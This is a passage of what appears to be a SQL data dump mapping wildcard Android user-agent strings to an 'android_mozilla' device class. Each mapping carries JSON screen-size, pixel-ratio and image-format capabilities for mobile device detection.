Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; xx X822) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; xx X829) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile DuckDuckGo/5 Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 15 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 15 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 15) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 2PQ93) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 2PYB2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 2PZC5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 4047A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 4047D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 4047F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 4047G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 4047X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 404SC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 4E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5.5M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5009A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5009D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5009D_RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5011A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5026A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5026D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5026J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 502SO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5044G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5044P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5046G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5047D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5047U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5047Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5049E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5049G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5049S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5049W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5049Z) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5058) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5058A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5058I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5058I_RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5058J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5058Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5060) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5061) AppleWebKit/* (KHTML, like Gecko) Chrome','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5061) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5062) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 506SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 507SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5085G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5085O) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5086A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5086D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5086Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5090A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5090Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5158A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5186D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 5S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 6001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 601HT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 601SO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 602KC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 603SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 6058A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 6058D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 6058X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 6060S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":3.375,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 6060X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 606SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 608HW) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 610) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 62S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 7071D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 9008A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 9008D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 9008J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 9008N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; 9008X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; A0001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; A1 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; A1 lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; A1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; A10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; A121) AppleWebKit/* (KHTML, like 